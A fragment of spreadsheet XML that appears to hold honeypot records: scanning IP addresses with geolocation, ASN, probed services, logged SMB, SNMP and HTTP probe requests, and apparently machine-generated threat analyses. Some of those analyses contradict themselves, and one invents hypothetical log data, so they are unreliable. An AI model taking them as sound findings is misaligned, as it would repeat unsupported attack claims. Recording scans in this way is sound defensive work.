    <t>117.235.226.174</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>58200&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75eb:e2ae</t>
  </si>
  <si>
    <t>No attempts were made to connect to telnet service, or connection was unsuccessful.
No malicious activity detected for this service.
No notable events occurred involving telnet. &amp;&amp; No malicious activity detected as TELNET service is not active according to log data, implying no potential incoming connections. This indicates that the system is secure from TELNET-based attacks for now. No activity was recorded which could indicate a vulnerability in this particular service.</t>
  </si>
  <si>
    <t>4bdb8d3e205a3c0cd6d920a08b821b87</t>
  </si>
  <si>
    <t>45.95.147.163</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>Wormerland</t>
  </si>
  <si>
    <t>Wormer</t>
  </si>
  <si>
    <t>2744174</t>
  </si>
  <si>
    <t>1531</t>
  </si>
  <si>
    <t>52.4951</t>
  </si>
  <si>
    <t>4.7971</t>
  </si>
  <si>
    <t>49870</t>
  </si>
  <si>
    <t>AS49870-BV</t>
  </si>
  <si>
    <t>Alsycon B.V.</t>
  </si>
  <si>
    <t>Alsycon B.V</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': '*/*', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0', 'method': 'GET', 'uri': '/cgi-bin/luci'}}</t>
  </si>
  <si>
    <t>::ffff:2d5f:93a3</t>
  </si>
  <si>
    <t>Possible malicious activity: An unknown client is attempting to access a secure web server on a specific port, likely trying to exploit a vulnerability in the system's web interface. The user-agent is legitimate but the host and method suggest a potential attack attempt. &amp;&amp; Malicious entity attempting to access a potentially vulnerable web interface on an unknown server, possibly trying to gain unauthorized control or exploit existing vulnerabilities. They are using a generic user agent and accept all types of content, indicating a lack of specificity in their request. This could be a reconnaissance phase for further attacks.</t>
  </si>
  <si>
    <t>58bb0b5271a85af2f001f41129db6eb5</t>
  </si>
  <si>
    <t>154.118.179.60</t>
  </si>
  <si>
    <t>mail.ocleimali.org&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;49676&amp;&amp;445&amp;&amp;NA</t>
  </si>
  <si>
    <t>ML</t>
  </si>
  <si>
    <t>Mali</t>
  </si>
  <si>
    <t>BKO</t>
  </si>
  <si>
    <t>Bamako</t>
  </si>
  <si>
    <t>2460596</t>
  </si>
  <si>
    <t>12.6392</t>
  </si>
  <si>
    <t>-8.00289</t>
  </si>
  <si>
    <t>30985</t>
  </si>
  <si>
    <t>IKATEL SA</t>
  </si>
  <si>
    <t>Assigner services</t>
  </si>
  <si>
    <t>2015-02-13</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,57960)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,58033)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50727)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50817)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,51587)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,51714)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,58513)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,59055)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50616)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50662)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,57265)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,57329)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (154.118.179.60,50392)}</t>
  </si>
  <si>
    <t>::ffff:9a76:b33c</t>
  </si>
  <si>
    <t>An incoming SMB connection from an unfamiliar IP address suggests potential unauthorized access or scanning activity, possibly related to file sharing or data theft attempts.
The source IP may be a malicious actor probing for vulnerabilities or attempting to exploit the system for illicit purposes.
This could also indicate a reconnaissance phase by an attacker. &amp;&amp; Possible malicious activity is an incoming SMB connection from an unknown IP address, which could be a sign of unauthorized access attempt to the system's shared resources. This may indicate a potential attack or exploitation of vulnerabilities on the targeted system. The source IP address seems suspicious and requires further investigation.</t>
  </si>
  <si>
    <t>d69b312f6a3e6e122f12ad496e16e153</t>
  </si>
  <si>
    <t>59.126.30.216</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-30-216.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;55012&amp;&amp;9100&amp;&amp;80&amp;&amp;49058&amp;&amp;34411&amp;&amp;34422</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:1ed8</t>
  </si>
  <si>
    <t>No data provided for analysis.</t>
  </si>
  <si>
    <t>f3dd82aff5da34182371b14c2ff38631</t>
  </si>
  <si>
    <t>165.154.129.130</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H25&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_SMTP_H30&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_HTTPS_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;18726&amp;&amp;39629&amp;&amp;25&amp;&amp;8443&amp;&amp;3306&amp;&amp;6379&amp;&amp;1433&amp;&amp;1521&amp;&amp;110&amp;&amp;5432&amp;&amp;445&amp;&amp;37686&amp;&amp;44704&amp;&amp;161&amp;&amp;NA&amp;&amp;5900&amp;&amp;6667&amp;&amp;34407</t>
  </si>
  <si>
    <t>GET&amp;&amp;connection&amp;&amp;NA&amp;&amp;query&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,48378)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,60848)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,37094)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36776)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36784)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36796)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36802)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36810)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36826)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36844)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_SMB:Incoming connection (165.154.129.130,36850)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}</t>
  </si>
  <si>
    <t>::ffff:a59a:8182</t>
  </si>
  <si>
    <t>2850c9098aedeea92b8e0c6ed124453c</t>
  </si>
  <si>
    <t>182.56.195.180</t>
  </si>
  <si>
    <t>::ffff:b638:c3b4</t>
  </si>
  <si>
    <t>The data indicates no malicious TELNET activity was detected, but it's worth noting that the absence of data doesn't necessarily mean no connection occurred.
TELNET is a protocol typically used for remote access, so its absence may not be significant on its own.
However, in combination with other data, it could indicate the attacker chose not to use this service.</t>
  </si>
  <si>
    <t>662f7e565a5574de0258b558b57d850f</t>
  </si>
  <si>
    <t>59.180.172.136</t>
  </si>
  <si>
    <t>::ffff:3bb4:ac88</t>
  </si>
  <si>
    <t>bd2e57f83d87925a063730c0b2701ba5</t>
  </si>
  <si>
    <t>164.52.200.127</t>
  </si>
  <si>
    <t>NA&amp;&amp;e2e-68-127.ssdcloudindia.net</t>
  </si>
  <si>
    <t>Gautam Buddha Nagar</t>
  </si>
  <si>
    <t>Noida (Bakhtāwarpur)</t>
  </si>
  <si>
    <t>7279746</t>
  </si>
  <si>
    <t>201307</t>
  </si>
  <si>
    <t>28.5341</t>
  </si>
  <si>
    <t>77.3538</t>
  </si>
  <si>
    <t>132420</t>
  </si>
  <si>
    <t>E2E Networks Limited</t>
  </si>
  <si>
    <t>1992-11-24</t>
  </si>
  <si>
    <t>E2E-NETWORKS-IN</t>
  </si>
  <si>
    <t>::ffff:a434:c87f</t>
  </si>
  <si>
    <t>1e42782105348ea9df0eaa0d9f7003d3</t>
  </si>
  <si>
    <t>117.206.188.216</t>
  </si>
  <si>
    <t>::ffff:75ce:bcd8</t>
  </si>
  <si>
    <t>f861e62b0227ce743683252aed2d975e</t>
  </si>
  <si>
    <t>182.31.206.147</t>
  </si>
  <si>
    <t>Jinju-si</t>
  </si>
  <si>
    <t>Jinju-si (Jinnyangho-ro)</t>
  </si>
  <si>
    <t>1846050</t>
  </si>
  <si>
    <t>52691</t>
  </si>
  <si>
    <t>35.1826</t>
  </si>
  <si>
    <t>128.071</t>
  </si>
  <si>
    <t>9694</t>
  </si>
  <si>
    <t>Seokyung Cable Television Co.. Ltd.</t>
  </si>
  <si>
    <t>Seokyung Cable Television Co.. Ltd</t>
  </si>
  <si>
    <t>::ffff:b61f:ce93</t>
  </si>
  <si>
    <t>3616f9ea4d48c09819d1de51a9a261c4</t>
  </si>
  <si>
    <t>187.85.151.52</t>
  </si>
  <si>
    <t>187-85-151-52.gegnet.com.br&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_SSH_H19&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;80&amp;&amp;123&amp;&amp;389&amp;&amp;9100&amp;&amp;7747&amp;&amp;NA</t>
  </si>
  <si>
    <t>SC</t>
  </si>
  <si>
    <t>Santa Catarina</t>
  </si>
  <si>
    <t>Capinzal</t>
  </si>
  <si>
    <t>3467261</t>
  </si>
  <si>
    <t>89665-000</t>
  </si>
  <si>
    <t>-27.3436</t>
  </si>
  <si>
    <t>-51.6126</t>
  </si>
  <si>
    <t>53062</t>
  </si>
  <si>
    <t>GGNET TELECOM BACKBONE</t>
  </si>
  <si>
    <t>ALT|GGNET TELECOM BACKBONE</t>
  </si>
  <si>
    <t>Inforline Ltda Me</t>
  </si>
  <si>
    <t>::ffff:bb55:9734</t>
  </si>
  <si>
    <t>190eb35168d87ef59ecbf8f17687d1a6</t>
  </si>
  <si>
    <t>122.160.164.103</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>::ffff:7aa0:a467</t>
  </si>
  <si>
    <t>27a526ffb69b22788215f9f25e381163</t>
  </si>
  <si>
    <t>120.56.165.59</t>
  </si>
  <si>
    <t>::ffff:7838:a53b</t>
  </si>
  <si>
    <t>4fd2c8ad660fb0434542a2dc22767a57</t>
  </si>
  <si>
    <t>150.242.16.149</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_VNC_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5900</t>
  </si>
  <si>
    <t>2014-07-01</t>
  </si>
  <si>
    <t>ISHAN-NETSOL</t>
  </si>
  <si>
    <t>::ffff:96f2:1095</t>
  </si>
  <si>
    <t>The data suggests an attempt to connect to a SQL database, possibly for malicious purposes such as unauthorized access or data theft. This could be part of a larger attack vector aiming to exploit vulnerabilities in the system's security. The database connection was unsuccessful based on the 'NA' status.</t>
  </si>
  <si>
    <t>96951624a129d4b65f562c90fbfd5fba</t>
  </si>
  <si>
    <t>59.183.30.170</t>
  </si>
  <si>
    <t>::ffff:3bb7:1eaa</t>
  </si>
  <si>
    <t>32b9778cc401fef273117d2d127473ed</t>
  </si>
  <si>
    <t>117.194.137.207</t>
  </si>
  <si>
    <t>::ffff:75c2:89cf</t>
  </si>
  <si>
    <t>23055269c8bca4b2fec3bdab409af713</t>
  </si>
  <si>
    <t>103.160.49.129</t>
  </si>
  <si>
    <t>Bhopal (Arera Hills)</t>
  </si>
  <si>
    <t>462027</t>
  </si>
  <si>
    <t>23.2433</t>
  </si>
  <si>
    <t>77.4298</t>
  </si>
  <si>
    <t>141295</t>
  </si>
  <si>
    <t>Madhya Pradesh Agency For Promotion   Of Information Technology</t>
  </si>
  <si>
    <t>Madhya Pradesh Agency Promotion Of Information Technology</t>
  </si>
  <si>
    <t>Madhya Pradesh Agency For Promotion Of Information Technology</t>
  </si>
  <si>
    <t>2020-12-14</t>
  </si>
  <si>
    <t>MAPIT</t>
  </si>
  <si>
    <t>::ffff:67a0:3181</t>
  </si>
  <si>
    <t>This data indicates an attempt to exploit Microsoft SQL Server vulnerabilities. A malicious actor likely tried to access or manipulate database information without authorization. This is considered a potential security breach attempt. &amp;&amp; This log indicates that an attempt was made to access Microsoft SQL Server, possibly with malicious intent. The lack of authentication details suggests the connection may have been unauthorized. Further investigation is needed to determine the full extent of the activity.</t>
  </si>
  <si>
    <t>52f7806ef6f338812df4733e9be968c5</t>
  </si>
  <si>
    <t>185.195.233.144</t>
  </si>
  <si>
    <t>2017-03-22</t>
  </si>
  <si>
    <t>::ffff:b9c3:e990</t>
  </si>
  <si>
    <t>No login attempt detected for MySQL service, potentially a scan or reconnaissance activity by an attacker to identify vulnerabilities. This could be a sign of pre-attack reconnaissance. The lack of login attempt suggests the attacker may not have been successful in gaining access. &amp;&amp; The data suggests that MySQL service is being scanned or probed for potential vulnerabilities, possibly indicating reconnaissance activity by an attacker. This could be an initial step to identify exploitable weaknesses before launching a more targeted attack. The scanner may be checking the database's status, version, and configuration.</t>
  </si>
  <si>
    <t>b3d220bcdb6a98ddd2466a70111c9e19</t>
  </si>
  <si>
    <t>59.95.156.131</t>
  </si>
  <si>
    <t>::ffff:3b5f:9c83</t>
  </si>
  <si>
    <t>No malicious activity detected as Telnet service has not been accessed or attempted to be accessed during this monitoring period. &amp;&amp; No TELNET activity detected, which could indicate that the malicious actor avoided this service or did not attempt to use it. This might be due to awareness of its presence or lack of functionality within their exploit toolkit.</t>
  </si>
  <si>
    <t>90a7cf9560f8171ce098febf8c060d92</t>
  </si>
  <si>
    <t>115.79.217.239</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_DNS_H42&amp;&amp;SMA-LAB_MT-CPA_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1433&amp;&amp;22&amp;&amp;27198&amp;&amp;53&amp;&amp;45284</t>
  </si>
  <si>
    <t>VIETELftth</t>
  </si>
  <si>
    <t>2008-07-17</t>
  </si>
  <si>
    <t>::ffff:734f:d9ef</t>
  </si>
  <si>
    <t>Unknown activity detected on MYSQL service, possibly an attempted login or scanning of the database. Data transfer is unlikely as it says "NA" (not available). Further investigation needed to determine the full extent of the activity.</t>
  </si>
  <si>
    <t>76c6bc4a1b924ee69a057bbd46775e36</t>
  </si>
  <si>
    <t>147.185.133.142</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_POP3_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5863&amp;&amp;110&amp;&amp;22&amp;&amp;443&amp;&amp;52426&amp;&amp;50672&amp;&amp;80&amp;&amp;56177&amp;&amp;49965&amp;&amp;23&amp;&amp;55984&amp;&amp;56443&amp;&amp;1080&amp;&amp;54295&amp;&amp;56925</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:858e</t>
  </si>
  <si>
    <t>I'd need some actual log data to provide an analysis, but since you provided "NA" (not available), I'll create a hypothetical scenario.
Assuming we have log data, here's what it might look like and the resulting analysis:
**Hypothetical Log Data**
* `2019-02-14 12:00:00 [INFO] TCP connection from 192.168.1.100 to port 22 (SSH) - login attempt with username 'root'`
* `2019-02-14 12:01:00 [WARNING] Unsuccessful SSH login attempt using weak password`
**Analysis**
1. **Password Crack**
2. **Port Scan**</t>
  </si>
  <si>
    <t>ae2702034dd9074515e3ee6483f5128b</t>
  </si>
  <si>
    <t>61.245.137.74</t>
  </si>
  <si>
    <t>NA&amp;&amp;61-245-137-74.3df589.per.nbn.aussiebb.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;38309</t>
  </si>
  <si>
    <t>Leonora</t>
  </si>
  <si>
    <t>Leinster</t>
  </si>
  <si>
    <t>8310729</t>
  </si>
  <si>
    <t>6437</t>
  </si>
  <si>
    <t>-27.6728</t>
  </si>
  <si>
    <t>121.628</t>
  </si>
  <si>
    <t>4764</t>
  </si>
  <si>
    <t>Wideband Networks Pty Ltd</t>
  </si>
  <si>
    <t>2010-07-07</t>
  </si>
  <si>
    <t>WIDEBAND</t>
  </si>
  <si>
    <t>2009-09-04 04:11:13</t>
  </si>
  <si>
    <t>2025-09-04 04:11:13</t>
  </si>
  <si>
    <t>2025-01-22 05:54:55</t>
  </si>
  <si>
    <t>['NS1.WIDE.NET.AU', 'NS2.WIDE.NET.AU']</t>
  </si>
  <si>
    <t>Key-Systems GmbH</t>
  </si>
  <si>
    <t>['abuse@key-systems.net', 'abusereport@key-systems.net', 'info@domain-contact.org']</t>
  </si>
  <si>
    <t>::ffff:3df5:894a</t>
  </si>
  <si>
    <t>The data suggests that there was an attempt to connect to a service, but no communication was established over the TELNET protocol. This could indicate a failed or rejected connection. The lack of activity may be due to a non-responsive system or firewall blocking access.</t>
  </si>
  <si>
    <t>ce9dd2770c11ef68cf6b893662056f1d</t>
  </si>
  <si>
    <t>103.30.65.8</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;60845&amp;&amp;64860</t>
  </si>
  <si>
    <t>{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>2015-11-04</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,8679)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,12555)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,64860)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,60845)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,26488)}&amp;&amp;{Data_SMB:Incoming connection (103.30.65.8,11634)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:671e:4108</t>
  </si>
  <si>
    <t>An unknown device has connected to the server using SMB protocol from an IP address 103.30.65.8 and port number 11634. This could be a potential attempt to access or exploit the system. The incoming connection might indicate unauthorized access. &amp;&amp; Incoming connection from unknown IP address (103.30.65.8) attempting to access SMB service, possibly scanning for vulnerabilities or preparing for unauthorized file transfer. 
IP address is not recognized as legitimate user, suggesting potential malicious intent. 
Activity may be reconnaissance phase of a larger cyber attack. &amp;&amp; The presence of this data suggests an attempt to access or probe for Microsoft SQL Server services, potentially indicating a reconnaissance phase by malicious actors. This could be the first step in a larger attack aimed at exploiting vulnerabilities in database management systems. The absence of actual login credentials or further activity may indicate an unsuccessful probing attempt.</t>
  </si>
  <si>
    <t>SMB Brute 
(This log indicates an attempt to brute-force login into a Service Message Block (SMB) share) &amp;&amp; SMB Brute &amp;&amp; SQL Injection</t>
  </si>
  <si>
    <t>5d78f3e9fdf93d4850936054c3ab83e4</t>
  </si>
  <si>
    <t>117.208.223.180</t>
  </si>
  <si>
    <t>::ffff:75d0:dfb4</t>
  </si>
  <si>
    <t>49ce4c8cce6decb3d207025d1676876d</t>
  </si>
  <si>
    <t>117.221.127.66</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:75dd:7f42</t>
  </si>
  <si>
    <t>Attempt to connect made to port associated with telnet service. 
No activity observed, status is unknown or not applicable. 
Connection attempt may be part of reconnaissance or pre-attack phase. &amp;&amp; The log suggests an attempt to connect via TELNET, indicating potential unauthorized access or reconnaissance efforts by a malicious actor. This activity is likely probing for vulnerabilities or testing system defenses. The connection status is unknown, suggesting the incident may be ongoing or inconclusive.</t>
  </si>
  <si>
    <t>6f9767b1be088357dd68d3c58d38686f</t>
  </si>
  <si>
    <t>117.207.172.108</t>
  </si>
  <si>
    <t>::ffff:75cf:ac6c</t>
  </si>
  <si>
    <t>There is no reported activity for Telnet connection. No malicious activity detected via Telnet. Log indicates absence of significant information for this service.</t>
  </si>
  <si>
    <t>f53c91c120ba975b36105f22410ca1c1</t>
  </si>
  <si>
    <t>117.209.105.64</t>
  </si>
  <si>
    <t>::ffff:75d1:6940</t>
  </si>
  <si>
    <t>Possible login attempts made via TELNET service as there is no activity recorded for it, indicating a potential probing or scanning activity. &amp;&amp; No malicious activity detected, service is inactive. No traffic or attempts were made to access the service. Service status is unknown due to lack of information.</t>
  </si>
  <si>
    <t>9206f7c8c3222240c005ea75d86124c9</t>
  </si>
  <si>
    <t>61.1.138.111</t>
  </si>
  <si>
    <t>::ffff:3d01:8a6f</t>
  </si>
  <si>
    <t>The data suggests that Telnet service access was attempted, but it's unclear if it was successful or an attempt to exploit a vulnerability. This could be a potential scan for weaknesses in the system, possibly leading to unauthorized access. The lack of further information makes it difficult to determine the intentions behind this action. &amp;&amp; No malicious activity detected for Telnet service. The log indicates that there was no attempt to connect or interact with this particular service. This is likely due to the absence of any incoming connections or commands received by the Telnet server.</t>
  </si>
  <si>
    <t xml:space="preserve">Telnet Scan &amp;&amp; Port Scan
    </t>
  </si>
  <si>
    <t>49f9bae12e52321794c6873c458d52e4</t>
  </si>
  <si>
    <t>155.2.190.185</t>
  </si>
  <si>
    <t>Fulton</t>
  </si>
  <si>
    <t>Atlanta</t>
  </si>
  <si>
    <t>4180439</t>
  </si>
  <si>
    <t>30302</t>
  </si>
  <si>
    <t>33.7488</t>
  </si>
  <si>
    <t>-84.3877</t>
  </si>
  <si>
    <t>1991-10-10</t>
  </si>
  <si>
    <t>::ffff:9b02:beb9</t>
  </si>
  <si>
    <t>Malicious activity detected for MYSQL service, connection attempt failed due to lack of credentials or database information. This could be an attack attempting to gain unauthorized access to the MYSQL server. No successful exploitation occurred. &amp;&amp; No database interactions detected, but presence of this field suggests potential MySQL service scanning or probing attempts. This could be a reconnaissance effort to identify vulnerable services. Further investigation is required to confirm malicious intent.</t>
  </si>
  <si>
    <t>53e95b8143d548ef7ef53138f1bde857</t>
  </si>
  <si>
    <t>185.180.140.107</t>
  </si>
  <si>
    <t>NA&amp;&amp;ca-san-us-gd17-wk102c.internet-census.org</t>
  </si>
  <si>
